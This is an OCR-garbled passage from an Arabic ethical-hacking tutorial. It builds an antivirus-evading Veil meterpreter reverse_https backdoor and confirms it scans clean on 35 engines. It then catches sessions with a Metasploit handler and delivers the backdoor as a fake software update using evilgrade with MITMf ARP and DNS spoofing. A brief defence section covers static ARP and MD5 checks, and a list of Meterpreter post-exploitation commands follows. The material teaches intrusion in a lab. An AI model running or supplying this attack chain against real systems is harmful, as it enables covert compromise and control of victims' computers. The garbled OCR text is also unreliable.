سنقوم بتعديل خيار 51۴۴۴ وهو عدد الثواني التي ينتظرها الباب الخلفي قبل تنفيذ الحمولة. في الحالة 


التاليةء يتعين علينا الانتظار 6 توانِ: 


set SLEEP 6 


لقطة الشاشة التالية توضح التغييرات: 


[qg0meterpreter/rev https>>]: option 


Payload: go/meterpreter/rev https selected 


Description 


Require X number of clicks before execution 
Compile to an executable 

Check for mouse movements 

Check for a minimum number of gigs for hard disk 
Optional: Required system hostname 

virtual or Heap 

IP of the Metasploit handler 

Port of the Metasploit handler 

Minimum number of running processes 

Check for active VM processes 

Optional: Minimum number of processors 

Check for at least 3 gigs of RAM 

Optional: Sleep "¥" seconds, check 1f accelerated 
Optional: The required user account 

Prompt user prior to injection 

Check if system uses UTC time 


Virtual 
10.0.2. 15 
S080 

E 

FALSE 

1 

FALSE 


Go back to Veil -Evasion 
Completely exit Veil 
Generate the payload 

Show the shellcode's options 
set shellcode option 


Required Options: 


ENES 

BADMACS 
CLICKTRACK 
COMPILE TO EXE 
CURSORCHECK 
DISKSIZE 
HOSTNAME 
INJECT METHOD 
LHOST 

LPORT 
MINPROCS 
PROCCHECK 
PROCESSORS 
RAMCHECK 
SLEEP 
WSERNAME 
USERPROMPT 
UTCCHECK 


Available Commands : 


back 
exit 
qenerate 
options 
set 


https://www. veill-framework. com/ | [Twitter]: 


[>] Please enter the base name for output files (default is payload): § 


java WV point 


سنقوم الآن بتسمية بابنا الخلفي باسم ۲6۷_05_8080. توضح لقطة الشاشة التالية ما نراه بمجرد 


إنشاء باب خلفي. يتضمن ذلك الوحدات المستخدمة من قبل الباب الخلفي» ومكان تخزينها: 


[web]: https://www.vell-framework.com/ | [Twitter]: @VeilFramework 


Language: go 

Payload Module: go/meterpreter/rev https 

Executable written to: /var/lib/veil/output/compiled/rev https 8080 .,exe 

Source code written to: /var/lib/veil/output/source/rev https 8080. g0 

Metasploit Resource file written to: /var/lib/veil/output/handlers/rev https 8080.rc 


Hit enter to continue... 

لاختبار الباب الخلفي الخاص بناء سنتجاوز أمر ٤۷)ءهطء‏ ك'ااه۷» والذي ليس دائمًا دقيقًاء 

واهاهآءد۷i»‏ الذي يشارك نتائجه مع برنامج مكافحة الفيروسات» ونختار بدلا من ذلك موقع 
buteاstrاN0‏ كما هو موضح في لقطة الشاشة التالية: 


0m NoDistribute Login F#Pricing SAbout vv ll 3 scans remaining 


No file selected. 


Scan File 


ف 


Scan A File 


Select your file in order to scan your file with over 35 anti-viruses. 
The results of the scans are never distributed. 


الان» سنقوم بالنقر فوق 'تصفح" )8۲٥W56(‏ ... وانتقل إلى ملفنا على 


veil output /compiled‏ /r/shareاsا/»‏ کما هو موضح على النحو التالي: 


e en El 


® Recent ۳ &@ var lib veil output | compiled | » 

@ Home | Name v Size Modified 
rev_https_8080.exe 2=9MB 05:21 

mi Desktop 

[ Documents 

© Downloads 

fd Music 


û Pictures 


Hl Videos 


+ Other Locations 


بمجرد النقر فوق ١اأ۴ 502١‏ يمكننا أن يتجاوز الملف الذي حمّلناه بنجاح جميع برامج مكافحة 
الفيروسات» كما هو موضح في لقطة الشاشة التالية: 


۹ 
5ü Texf Results Image HESUIES % LITE 0 History 


Bi Fllename ك‎ 5€ 

FE_FEI_ BD eT 8 HE 
a MDS 1 SHA2Z56 

STSADM TERIA T2534 STE UTE ERs ha a ln IL TE lon ELLE 
# Detected by Ê Scan Date 

E 2017, 8:49-27 اة‎ 


Your file has been scanned with 35 different antivirus software (MO fFešUlts have been dlstrIbuted)}. 
The FrESultS öf thê scams has been provided bEelöwîi In alphabetical öfder. 


Tir: Faeer ger anı AniîÎirıgê Bû See It tersan al fhe time of thie scan 

#! A-Squared: Clean MK Kaspersky Antivirus: Clean 
A Ad-Aware: Clean # MzAfee: Clean 

Î Avast Clean ا‎ 

i MS SeturRy Etsentlak: Cltari‏ فوا ا“ 
AG Fret: Clean ıı NANO Antivirus: Clean‏ 8 

N Avira: Clean 

[Î Noman Clean‏ ا 


BitDefender: Clearni 
ټ‎ ۹ n a 


EIBulGuara LEan 
ز0‎ Fanmda ComimandLine: Clear 


سوف يعمل الحجاب بشكل أفضل عندما يتم تحديثه بأحدث إصدار. 


CA 


java WY point 
Listening for التنصت على الاتصالات‎ 
connections 
يستخدم الباب الخلفي الذي أنشأناه حمولة عكسية. لتشغيل الحمولة العكسيةء نحتاج إلى فتح منفذ في آلة‎ 
الخاصة بنا حتى يتمكن الجهاز المستهدف من الاتصال به. عندما أنشأنا الباب الخلفي» قمنا بتعيين‎ 
المنفذ إلى 8080ء لذلك نحن بحاجة إلى فتح منفذ 8080 على جهاز ااج لدينا. في هذا المثالء اسم‎ 
.meterpreter / rev_htpضsS الحمولة المختارة لدینا هى‎ 


الآن» سنقوم بتقسيم الشاشة الخاصة بنا والاستماع إلى الاتصالات الواردة باستخدام إطار عمل 
ottامMetasp.‏ سوف نستخدم الأمر عامئ مهوم لتشغيل †أمامعةا 6ء ويجب أن يولد مخرجات 


مماثلة للشاشة التالية: 


‘¥ msfconsole 


dBBBBBBb dBBBP dBBBBBBEP dEBBBBBb 
٤ dB ' BBP 
dB'dB'dB' dBBP dBP dBP BB 
dB"'dB'dB"' dBP dBP dBP BE 
dB" dB'dB' dBBBBP dBP dBBBBBBB 


dBBBBBb dBP dBBBBP dBP dBBBEBBEP 
dB" dBP dB" .BP 
dBBBB' dBP dB" .BP dBP dBP 
dBP dBP dB' .BP dBP dBP 
dBP dBBBBP dBBBEP dBP dBP 


To boldly go where no 
shell has gone before 


=[ metasploit v4. 16.58-dev 
--=[ 1769 exploits - 1007 auxiliary - 307 post 
- --=[ 537 payloads - 41 encoders - 10 nops 
--=[ Free Metasploit Pro trial: Nhttp://r-7.co/trymsp 


للاستماع إلى اتصال وارد» نحتاج إلى استخدام وحدة نمطية في أاهامئةا6" والتي هي 
erاti/handاit/muاp×ه.‏ استخدم الأمر التالي لتشغيل هذه الوحدة: 


use exploit/multi/handler 5 


بمجرد تشغیل هذا الأمر« انتقل إلى وی>دö .exploit/multi/handler‏ هم شيء نود تحدیده في هذه 
الوحدة هو الحمولة التي نقوم بها باستخدام الأمر ٤#ء.‏ الآن استخدم الأمر التالي لتعيين الحمولة ك 


:windows/meterpreter/revers_https 


set PAYLOAD windows/meterpreter /revers_https 


الآان» سنستخدم مر ionsامpە‏ Ww٥hء‏ لنری أن الحمولة قد تغيرت إlى‏ / windows / meterpreer‏ 
rs_sاreve.‏ كما هو موضح في لقطة الشاشة التالية: 


msf > use exploit/multi/handler 

msf exploit ( J) > set PAYLOAD windows/meterpreter/reverse https 
PAYLOAD => windows/meterpreter/reverse https 

msfî exploit ( J) = show options 


Module options (exploit/multi/handlLer]} : 


Payload options (windows/meterpreter/reverse https): 
ENE Current Setting Required Description 
Exit technique (Accepted: '', seh, thread, process, none) 
LHOST The local listener hostname 
LPORT 8443 The local listener port 
II The HTTP Path 
Exploit target: 


Id Name 


0 wildcard Target 


سنقوم بتعيين 1051ا على عنوان ۴| الخاص بجهاز ااه لدينا باستخدام الأمر التالي: 


| seLHOSTI0.0.2.15 | 


قبل الذهاب إلى أبعد من ذلك» سنحرص على ضبط الحمولة والمضيف والمنفذ بشكل صحيح بنفس القيمة 
التي تم إنشاؤها باستخدام الباب الخلفي في الأصل» كما هو موضح أدناه: 


msf exploit ( J) = set LHOST 10.0.2.15 
LHOST => 10.0.2.5 

msf exploit ( J) => set LPORT 8080 
LPORT => 8080 

msf exploit ( J) = show options 


Module options (exploit/multi/handlLer)} : 


Namê 

EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) 
LHOST 18.0.2. 15 The local listener hostname 

LPORT 8080 The local listener port 

LURI The HTTP Path 


Exploit target: 


wildcard Target 


ما علينا القيام به هو تتفيذ أمر أأهام×ه. الآنء ينتظر اأهامءةا6“ وجود اتصال على المنفذ 8080 
وعلى عنوان ۴| الخاص بناء والذي هو 10.0.2.15ء كما هو موضح في لقطة الشاشة التالية. بمجرد 
إنشاء اتصال» سنكکون قادرین علی التحكم في الحاسوب الهدف: 


msf exploit ( J > exploit 


[]*] Started HTTPS reverse handler on https://10.0.2. 15: 8080 


Testing the backdoor 


اختبار الباب الخلفي 
الآن» سنختبر أن بابنا الخلفي يعمل كما هو متوقع. للقيام بذلك» سنضع الباب الخلفي الخاص بنا على 
خادم الويب وتتزيله من جهاز ١00۷S‏ الهدف. سنستخدم هذا النهج فقط لاختبار بابنا الخلفي. 


كما نعلم أنه يمكن استخدام جهاز اة كموقع على الويب» لذلك سنضع الباب الخلفي الخاص بنا على 


الإنترنت وننزله من الحاسوب الهدف. سنحتفظ بهذا التتزيل في مجلد يسمى ملفات الشر» كما هو موضح 
في لقطة الشاشة التالية: 


4 > 4 O var ww html * QA |) 2£) 5= | © &@ 8 
® Recent 
O ss evil-files û items 06:31 
= Desktop | index.html 10.7 KB 12 Apr 
[|j Documents : | index.nginx-debian.html 612 bytes 12 Apr 


Downloads 
Ad Music 

û Pictures 
HH Videos 


ü Trash 


+ Other Locations 
الآن» فإن الباب الخلفي الذي أنشأناه باستخدام ١i0ئة۴۷-اأ۷6» المخزن في‎ 


evasion /output/ compiled /‏ ا1b/veiا/arء‏ نحتاج إلى نسخها ولصقها في دلیل ١/۷٥-5٥اااً.‏ 


وهذا كل شيء. يمكننا تنزيل الملف من كالي. 


لبدء تشغيل موقع الويب أو خادم الويب» ادخل الأمر التالي في الجهاز : 


root@kali :~# service apache2 start 5 


هنا» ۷۵٣۵ء‏ هو الأمر» و 03٥0۲2‏ هو اسم خادم الویب. الآنء سنقوم بالضغط على E٣6١‏ لتنفیذ 
الأمر أعلاه. 

الآن» سوف نذهب إلى آلة 0۷Wل‏ "۷1 وننتقل إلى عنوان ۴| الخاص بجهاز ااتK‏ لدينا وهر 10.0.2.15. 
يجب أن يفتح هذا الملف ا6×.۸۳١”|‏ الأساسي الذي أنشأناه. يخبرنا أن خادم الويب لدينا يعمل»ء كما 


Ê 4 | FÎ Apache2 Debian Defaul X | +4 vw E x 
چ س‎ e 7) 10.0.2.5 + کا ا ف‎ 


(O Apache2 Debian Default Page 


This is the default welcome page used to test the correct operation of the Apache2 server after 
installation on Debian systems. If you can read this page, it means that the Apache HTTP server 


installed at this site is working properly. You should replace this file (located at 
/var/www/html/ index.html) before continuing to operate your HTTP server. 


If you are a normal user of this web site and don't know what this page is about, this probably means 
that the site is currently unavailable due to maintenance. If the problem persists, please contact the 
site's administrator. 


Debian's Apache2 default configuration is different from the upstream default configuration, and split 
into several files optimized for interaction with Debian tools. The configuration system is fully 
documented in /usr/share/doc/ apache2/ README.Debian.gz. Refer to this for the full 
documentation. Documentation for the web server itself can be found by accessing the manual if the 
apache2-doc package was installed on this server. 


The configuration layout for an Apache2 web server installation on Debian systems is as follows: 


/etc/apache2/ 
/-- apache2. conf 
°"--  ports.conf 
-- mods-enablLed 
/-- *.lLoad 
`-- ¥F.conf 
-- conf-enablLed 
`-- *.conf 
-- sites-enablLed 
`-- *.conf 


a و‎ 


e apache2.conf is the main configuration file. It puts the pieces together by including all remaining 
configuration files when starting up the web server. 


e ports.conf is always included from the main configuration file. It is used to determine the 
listening ports for incoming connections, and this file can be customized anytime. 


e Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/ directories contain 
particular configuration snippets which manage modules, global configuration fragments, or 
virtual host configurations, respectively. 


: 3:54 AM 
! 2: اسا‎ f ^ Fl le ga201 


JUI 


E O Type here to search 


إذا كنا نريد الانتقال إلى الدليل الذي يحتوي على الباب الخلفي» فسنذهب إلى 
10.0.2.15/evil-files‏ 


ونضغط على ١8١‏ . ثم يمكننا تنزيل وتشغيل الباب الخلفي» كما هو موضح في لقطة الشاشة التالية: 


java 


' point 


A 


(D 10.0.2.15/evil-files,‏ ل طط ے 


Index of /evil-files 


Name Last modified Sıize Description 
4 Parent Directory 


rev https S8Û080.exe 2018-06-18 05:21 2.EM 
Apacherd. 4.33 (Debian) Server at IO.Û.2. 13 Port S0 


الآن بعد أن قمنا بتشغيل الباب الخلفي على جهاز sس0ل١‏ ۷ء ستخبرنا آلة اه بأننا تلقينا اتصالا من 


msf exploit(multi/handler)} =» exploit 


[*] Started HTTPS reverse handler on https:/710.0.2. 15:8080 
[*] https://10.0.2.15:8088 handling request from 10.0.2.5; (UUID: lzfyzdlf)} Staging x86 payload (180825 bytes) ... 
[¥] Meterpreter session 1 opened (10.0.2.15:8080 -= 10.0.2.5:50208) at 2018-06-18 07:03:49 -0400 


meterpreter >‏ 
الآن لدينا حق الوصول الكامل عبر جهاز 00۷5 ۷1. كما نرى في لقطة الشاشة السابقةء لدينا جلسة 
اMeterprete.‏ والتي تتيح لنا أن نفعل أي شيء يمكن للمستخدم الفعلي لهذا الحاسوب القيام به. 


يمكننا استخدام الأمر ١ءء‏ للتحقق من أن الباب الخلفي يعمل بشكل صحيح. بعد تنفيذ هذا الأمرء 
سنرى أننا داخل الجهاز ۷0S0 ٤W N10‏ الذي يقوم بتشغيل 17134 «(Windows 10 (Build‏ 
ببنية 64×» ويستخدم لغة 5لا_6۸» و Meterp re6۲‏ 86× لنظام ٣۵0۷W5S‏ ۷ء كما هو موضح في لقطة 
الشاشة التالية: 


` = SYSINTO 
: MSEDGEWINIO 
: Windows 10 (Build 17134]. 
Architecture : X64 


System Language : en US 
Domain : WORKGROUP 
Logged On Users : 3 
Meterpreter : X86/windows 


EEN TE OT 


java WV point ۵ 
Fake bdml1 Update | وهمی‎ ٥41 تحدیث‎ 


الآن» لدينا باب خلفي غير قابل للكشف» لكن ما زلنا لم نجد طريقة فعالة لتسليم هذا الباب إلى الحاسوب 
الهدف. في الحياة الواقعيةء إذا طلبنا من الهدف تنزيل ملف قابل للتنفيذ وتشغيله» فمن المحتمل ألا يقوم 
بتنزيله وتشغيله» لذلك نحن الآن نبحث في كيفية مزيفة التحديث بحيث يريد المستخدم تنزيل وتثبيت الملف 


القابل للتنفيذ على آلة. 


سيعمل هذا السيناريو حتى نكون في منتصف الاتصال. على سبیل المثال» عند إعادة توجيه حركة المرور 


عبر الهاتف المحمول» أو عند تتفيذ هجوم ءالكأ"۴-۳٣)-١ا-٣ة"»‏ أو عند استخدام شبكة وهمية. 
في هذا القسم» سننظر في خداع 018 بالتسمم ۸۸8۴. هذا يعني أننا في نفس الشبكة مثل الجهاز 
المستهدف. في متالناء الشبكة سلكية. سنستخدم أداۃة تسمی ۲۵۵8واآ۷ع للعمل کخادم لإنتاج التحدیثات 
المزيفة. باستخدام الرابط التالي» يمكننا تنزيل r24٥‏ و|اا۷ع: 
https: //github.com/PacktPublishing /Fundamentals-of-Ethical-Hacking-from-—‏ 
Scratch‏ 


بمجرد قیامنا بتنزیل وتشغیل الأمر g۲۵۵8|ا6۷İء‏ سنقوم بتشغیل الأمر esاduمہ‏ ۷٣٥۸ء‏ للاطلاع على 
قائمة البرامج» ويمكتنا اختطاف التحديثات كما هو موضح في لقطة الشاشة التالية: 


ev1lqrade=show modules 


List of modules: 


في لقطة الشاشة أعلاهء يوجد 67 برنامجًا يمكنها اختطاف تحديثات منهاء بما في ذلك بعض البرامج 
الشائعة la şay «Download Accelerator Plus , Analytics , Google , Safari , Nokia Jin‏ 


سنستخدمه في هذا المثال. 


الآن؛ سنقوم بتشغیل الأمر 2p‏ واگہہء لاستخدام eاu 0۸۴P Md‏ . بعد ذلكء سوف نستخدم S۸0W‏ 
45 لإظهار جميع الخيارات القابلة للتكوين المتاحة» كما هو موضح في لقطة الشاشة التالية: 
evilgrade>conf igure dap‏ 
evilgrade(dap)=show options‏ 


Display options: 


description | This critical update f1x internal vulnerability | Description display in the update 

endsite | update. speedbit. com/updateok . html Website display when finish update 

enable Status 

title | Critical update Title name display in the update 

fallsite | www. speedbit.com/finishupdate. asp?noupdate=&R=Û0 | Website display when did't finish update 
./agent/agent . exe Agent to inject 


java WV point 


في لقطة الشاشة أعلاه» سنركز على الوكيل» لذلك نحتاج إلى استبدال مسار agent/agent.exe/.‏ 


بمسار البرنامج الدي سیتم تثبیته کتحدیٹث. فی حالنناء نرید تنبیت باب خلفی کتحدیث . 


في قسم إنشاء باب خلفي باا۷۴ » نستخدم م)ا_عهءامvعr.‏ لا تعمل مع 0۸۴. ولكن في هذا القسمء 
نستخدم باب خلفي مختلف يسمى .reverse_http lg مدختwي 4٥0)2400۲.۴×0‏ 


ملاحظة: لإنشاء مثل هذا الباب الخلفے برجے الرجوءع الے, الخطوات الموجودة فے, قسم انشاء باب خاب 
2 ي“ يرجى الرجوح ! جوده في لسم , ك 


SE 


الآن» سنقوم بتغيير الوكيل »)896١(‏ بحيث ينفذ الباب الخلفي الخاص بنا بدلا من التحديث» كما هو 


موضح في الأمر التالي: 


set agent /var/www/html/backdoor.exe 5 


سنستبدل المسار الموجود في الأمر إلى المسار حيث ۲۴۷6۲56_0 يوضع الباب الخلفي في مكانه. 


ثم سنقوم بتشغیل الأمر ۸5٥آامه‏ ۷٣٥۸ء‏ للتحقق من آنه قد تم تکوینه بشکل صحیح» کما هو موضح 
في لقطة الشاشة التالية: 


evilgrade(dap)>set agent /var/www/html/backdoor .exe 
set agent, /var/wwuw/html/backdoor .exe 


evilgrade(dap)>show options 


Display options: 


Name = Download Accelerator 

Version = 1.0 

Author = ["Francisco Amato < famato +[AT]+ infobytesec . com>" ] 
Description = "" 

VirtualHost = "(update.speedbit.com)" 


description | This critical update fix internal vulnerability | Description display in the update 

endsite | update.speedbit.com/updateok. html website display when finish update 

enable 1 Status 

title | critical update Title name display in the update 

failsite | www. speedbit.com/finishupdate.asp?noupdate=&R=0 | Website display when did't finish update 
| /var/wwuw/html/backdoor .exe Agent to inject 


يمكننا أيضًا تعيين أي خيارات أخرى نريدها هنا. نحن فقط سنكتب ١5‏ ١٥|أمه‏ 56 ملحوقا باسم الخيار. 


في المستقبلء ريما لن يعمل هذا الموقع الإلكترونيء لذلك إذا عرض خطأً على الحاسوب المستهدف» 


فسنغير هذا الموقع إلى آي موقع ویب نریده. سنقوم بتغییره إلى C0۳٥.†d0Iصصupdate.spe.‏ 


عندما يكون كل شيء جاهرًا» سنقوم بتشغيل الأمر 514٣‏ لبدء تشغيل الخادم» كما هو موضح في لقطة 
الشاشة التالية: 


evilgrade(dap)>start 
Use of uninitialized value $prompt in concatenation (.)} or string at /usr/lib/x86 64-linux-gnu/perl5/5.26/Term/ReadLine/Gnu. pm line 338. 


evilqrade(dap)= 
[19/6/2018:0:17:31] - [WEBSERVER] - Webserver ready. Waiting for connections ... 


evilgrade (dap)s 
[19/6/2018:0:17:31] - [DNSSERVER] - ONS Server Ready. Waiting for Connections ... 


الآن» في آي وقت یتلقی فيه 9۲۵۵8ا۷٤‏ طلب تحدیت؛ سیُخبر کل من يطلب تحدیتًا بوجود تحدیث باب 
خلفي لدينا. للقيام بذلك» نحتاج إلى إعادة توجيه أي طلب من موقع ١60i.00٠مء.26لمں‏ إلى 
.Evilgrade‏ 

سنفعل هذا التبديل باستخدام هجوم 9 أfههمء .0N5‏ باستخدام هذاء يمكننا محاكاة لأي طلبات من 


date.speedbit.comمu‏ إلى radeاوااv٤‏ (وعنوان ۱۴ الخاص بنا). 


الآنء نفتح ملف ۴.٤٥٥۸۴‏ ٣۳ا"‏ باستخدام 16۵0۵٩۵‏ باستخدام الأمر 


ثم لتجنب التعارض مع ٥4ه۲‏ ۷9ء سنقوم بتغيير منفذ خادم N5‏ 0 إلى 5353 كما هو موضح في 
لقطة الشاشة التالية: 
[DNS] ]‏ [ 
# 


# Here you can configure MITMf's internal DNS server 


# Use the TCP DNS proxy instead of the default UDP (not fully tested, might break stuff! 


= 
port = 3 # Port to listen on 
i 


1pVv ت‎ # Run in IPv6 mode (not fully tested, might break stuff!) 
# 

# Supported formats are 8.8.8.8#53 or 4.2.2.1#53#tcp or 2001:4860:4860: :8888 

# can also be a comma seperated list e.g 8.8.8.8,8.8.4.4 

# 


nameservers = 8.8.8.8 


TAI # Queries for IPv4 address records 
*.thesprawl.orga=192.168.178.27 


update.speedbit.com=10.0.2. 15 


إذا آلقینا نظرة علی سجلات ۸» فسنری أننا نعید توجيه أي طلبات إلى c0۳.٤۴۵6i٥۴٥مء.6ھلdمں‏ إلى 
05 0).)/. عنوان ۴| الخاص بناء والذي يعمل علیھ ٥raوااہع.‏ 


java WV point 


الآن» سنقوم بتشغيل 11۲۴ باستخدام الأمر التالي: 


root@kali :~# Mitmf —-—arp ¬-—spoof -—-gateway 
10.0.2.1 --target 10.0.2.5 —i etho -—dns 


ثم نضغط ٣6١‏ ۴. اكتمل خداع .0N5‏ الآن بعد تشغيل ۲۵١‏ 9و|أ۷ا» يمكن تنزيل بابنا الخلفي وتنفيذه 


:update.speedbit.CO0m ja 


:~# mitmfT --arp --spoof --gqateway 10.0.2.1 --target 10.0.2.5 -1 ethê --dns 


[*] MITMf v@û.9.8 - 'The Dark Side' 
Spoof vO.6 
| DNS spoofing enabled 
|_ ARP spoofing enabled 


Sergqglo-Proxy vO.2.1 online 
SSLstrip v0.9 by Moxie Marlinspike online 


Net-Creds v1.90 online 
MITMT-API online 
¥* Serving Flask app "core.mitmfapi" (lazy loading) 
Error starting HTTP server: [Errno 98] Address already in use 
_ HTTP server online 
* Environment: production 


Use a production WSGI server instead. 

* Debug mode: off 

* Running on http://127.0.0.1:9999/ (Press CTRL+C to quit) 
DNSChef vO0.4 online 
SMB server online 


للاستماع إلى الاتصالات» قم بتغيير الخيارات الموجودة على محطة ٥ا50١0ءآ5.‏ للقيام بذلك» سوف 
نستخدم وة windows / meterpreter / ى”lإ algal دıدحa,و «exploit/multi/handler‏ 


L۴0۸ وتحدید 11051 على 10.0.2.15 » وهي عنوان | لجهازنا الكالي»› و‎ » revers_http 
: إلى 8080ء كما هو مبين في لقطة الشاشة التالية‎ 


[1011] 


msf exploit ( J) > show options 


Module options (exploit/multi/handlLer) : 


Name Current Setting Required Description 


Payload options (windows/meterpreter/reverse http) : 


ENE Current Setting Required Description 

EXITFUNC process 5 Exit technique (Accepted: '', seh, thread, process, none) 
LHOST 10.0.2. 15 The local listener hostname 

LPORT 8080 = The local listener port 

LURI The HTTP Path 


للتكرار» سيقوم البرنامج المستهدف بالتحقق من وجود تحديثات باستخدامء «update.speedbI.C0"^‏ 
والذدي سیعید التوجیھ إلی عناوین ۴| حیث یتم تشغیل ٥4ھ‏ rواا۷ع.‏ 


الأن» نحن بحاجة إلى التحقق من وجود تحديثات 04۴ على الحاسوب الهدف. في حالتناء فإن الجهاز 
المستهدف هو جهاز يعمل بنظام ۵0۷5 ۷1/. عندما نحاول تحدیث تطبیق 0۸۴۳ء يجب أن يخبرنا مربع 
الحوار أن التحديث الضروري مطلوب» كما هو موضح في لقطة الشاشة التالية: 

j DAP Update - 11 


Update search results 


Praduct description: 


Thıs critical update fix Internal vulnerability 


cok es] cree | 


java WV point 
Meteإمءأ6۲ عند تنزيل التحديث وتثبيته» سنقوم بتشغيل الأمر ١0١أكإء في جلسة المحطة الطرفية‎ 
على جهاز ااه لدينا للتأكد من أننا نسيطر على الجهاز الهدف» كما هو موضح في لقطة الشاشة‎ 


msT exploit ( J) = exploit 
[*] Started HTTP reverse handler on http:7710.90.2.15:8080 


[*] http:/710.0.2.15:8080 handling request from 10.0.2.5; (UUID: xsscb7da) Staging x86 payload (180825 bytes] ... 
[*] Meterpreter session 1 opened (10.0.2.15:8080 -= 10.0.2.5:50942) at 2018-06-22 04:35:11 -0400 


meterpreter = 5sysinîo 


LCOMPUTEr : MSEDGEWIN1O 

05 : Windows 10 (Build 17134). 
Architecture : X64 

system Language : en US 

Domain : WORKGROUP 

Logged On Users : 3 

Meterpreter : XS86/windows 


ILD 


Protecting againstL ا‎ 
delivery methods ا‎ 


في هذا القسم» سوف نتعلم كيفية الحماية من طرق التسلیم. سنستخدم آدوات مثل ۸۲× أو جدول ۸۸۴ 


الثابت لمنع حدوث هجوم رجل في المنتصف» وتجنب الشبكات التي لا نعرفها. هناك احتياط آخر هو 
التأکد من أننا نستخدم 1۲۲۴۶ عند تنزيل التحديتات. هذا سوف يقلل من خطر تنزيل تحديث مزيف. 
سوف نتعلم أداة أخرى مفيدة» وهي 005 ۷1. سيقوم هذا البرنامج بتنبيهنا عند تعديل توقيع الملف أو 
المجموع الاختباري للملف بأي طريقةء مما يشير إلى أن الملف ليس الملف الأصلي. للتحقق» سنقوم 
بتنزيل وتشغيل 125 ١۷۷1ء‏ حيث يمكننا مقارنة التوقيع والاختبار الاختباري لملف ما. إذا كانت قيم 
التوقيع والمجموع الاختباري واحدةء يكون الملف آمتًا. يمكننا تنزيل ۷۷1١125‏ باستخدام الرابط التالي: 


http: //www.winmd5.com/ 


في لقطة الشاشة التاليةء يعرض الجزء المميز توقيع هذه الأداة: 


WinMDS Free - Windows MDS Utility Freeware - Mozilla Firefox ا‎ 0 


WinMD5 Free - Windows M x | + 


OC O www.winmd5.com ۰ 0 VU IN O 2 =‏ ج 
Most Visited JJ Offensive Security @ Kali Linux @ Kali Docs @ Kali Tools & Exploit-DB Wy Aircrack-ngq “™, Kali Forums 2%‏ ¥ 
C0 UII LL IIIIIIOUALCT. ۴‏ ا ال کے 1 e | OSL OIIU IIIIII COUT: ILAN NII AU‏ 


» Supports big files larger than 4 GB. 

» Low resource usage. luses less than ö5 ME RAM. 

» Don't require NET runtime installed. It is a standalone EXE file and the startup is speedy. There are MOS tools for Windows on the market, but most of them 
requires .NET runtime and they may take a few seconds to starl. This is also the reason | wrote the program. 

e» SUPpporis “Drag & Drop”. fou may either select a file, or drag and drop a file to the program window to get the MDS hash value. 

» SUPPONRS Yerification of original MÛS value and current MDS value. 

» Most imporlant, it is FREE. No spyware or adware bundle. 

» Small size, an effeciiye and tiny tool for data security. 


Download (only 249KB): 

Win MDS Freeware Download 

Win MDSFree.zip MOS: ?34B8840bGOab6AdaGEbO3acd 32244 ee 
WinMDbFree.exe MOS: EEE E EAE ERE DEEL eR e Se ANEE 


You may simply download it, hen unzip and put the exe to any folder on your hard drive, and start to use. No installation is5 required. The download does not contain 
any virus, Spyware, adware or malware. 


License Agreement: 


java WV point 


الآن» إذا واصلنا تصفح» فسيظهر لنا ملفات التوقيع. في هذا المثال» سنقوم بتحديد الملف الذي تم تنزيله 
لهذه الأداة نفسها. الآن» سنقارن هذا التوقيع مع التوقيع على الموقع» ويمكننا أن نرى في لقطة الشاشة 
التالية أن كلا التوقيعين متماثلان. هذا يعني أن الأداة لم يتم تعديلها وتنزيلها من موقع الويب: 


E WinMDSFree v1.20 — * 


PY winDsFree 


www. WwinmdS,. cam 


select a fIlle to compute MDS checksum (or drag and drop a fIile onto this window} 


Browse .. 


Lanrcel 


File Name and Size: Li lUserstakashtDownloadsiWinMDS.exe (91872 bytes] 
Lurrent file MUS checksum wale: 


444alet i90 ddSa4bé4caîeoebcêl îa 


Urıgınal fıle MDS checksum value (optional}. It usually can be found from website or .mdb fılı 


paste ita original m5 value to verify Verify 


Website About Exit 


LOS TTT TTT TT 


Post exploitation مقدمة فبما بعد الإستغلال‎ 
Introduction a 


لقد تعلمنا الآن كيفية الوصول إلى الجهاز الهدف لدينا. في هذا القسم» سنتعلم عددًا من الأشياء التي 
يمكن القيام بها بعد أن تمكنا من الوصول إلى جهاز حاسوب. سننظر فيما نقوم به مع الحاسوب الهدف 
بغخض النظر عن كيفية وصولنا إليه. 
في القسم السابق» عندما حصلنا على جلسة reverse Me terم e6۲‏ من هدفناء توقفنا دائما. ولكن في 
هذا القسم» سنبداً جلسة ١۲6۴6م1166۲.‏ سوف نتعلم» ما يمكننا القيام به بعد الوصول. سنناقش كيفية 
الحفاظ على الوصول لجهاز الحاسوب المستهدف حتى لو كان الهدف إعادة تشغيل الحاسوب أو قيام 
المستخدم بإلغاء تثبيت البرامج الضعيفة. سنبحث في كيفية تنزيل الملفات وقراءة الملفات وتحميل الملفات 
وفتح كاميرا الويب وبدء تشغيل ١996٥|ا۷ه۸‏ لتسجيل ضربات المفاتيح وما إلى ذلك. سننظر أيضًا في 
كيفية استخدام الحاسوب المستهدف كمحور لاستغلال جميع أجهزة الحاسوب على نفس الشبكة. في هذا 
القسم» ستركز كل الأشياء التي سنفعلها بعد أن استغلنا ثغرات أحد الأهداف واستطعنا الوصول إليه. 
سنقوم في هذا القسم بتغطية المواضيع التالية: 

Meterpreter ٽاlيصlwُÎ‎ 

ه أوامر نظام الملفات 

٠‏ طرق للحفاظ على الوصول 


۳ 
java ۹ J point 


في هذا القسم» سنتعرف على كيفية التفاعل مع 6۲ م۲ Mee‏ tsاoاMetasp.‏ في ×uا٣آاء‏ یتم استخدام 
الأمر ٣6۳‏ للحصول على معلومات حول أمر معين. لذاء فإن أول شيء سنفعله هو تشغيل أمر ما٥٣‏ 


للحصول على قائمة كبيرة بجميع الأوامر التي يمكننا تشغيلها. كما يخبرنا وصف ما يفعله كل أمرء كما 
هو موضح في لقطة الشاشة التالية: 


Description 

Help menu 

Backgrounds the current session 

Kills a background meterpreter script 

Lists running background scripts 

Executes a meterpreter script as a background thread 
Displays information or control active channels 
Closes a channel 

Detach the meterpreter session (for http/https)} 
Disables encoding of unicode strings 

Enables encoding of unicode strings 

Terminate the meterpreter session 

Get the current session timeout values 

Get the session GUID 

Help menul 

Displays information about a Post module 

Drop into irb scripting mode 

Load one or more meterpreter extensions 

Get the MSF ID of the machine attached to the session 
Migrate the server to another process 

Manage pivot listeners 

Terminate the meterpreter session 

Reads data from a channel 

Run the commands stored in a file 

Executes a meterpreter script or Post module 
Quickly switch to another session 

Set the current session timeout values 


Force Meterpreter to go quiet, then re-establish session. 


Modify the SSL certificate verification setting 
Change the current transport mechanism 
Deprecated alias for "load" 

Get the UUID for the current session 

writes data to a channel 


> background 


background 
bgqkill 
bglist 

bgrun 
channel 
close 

detach 
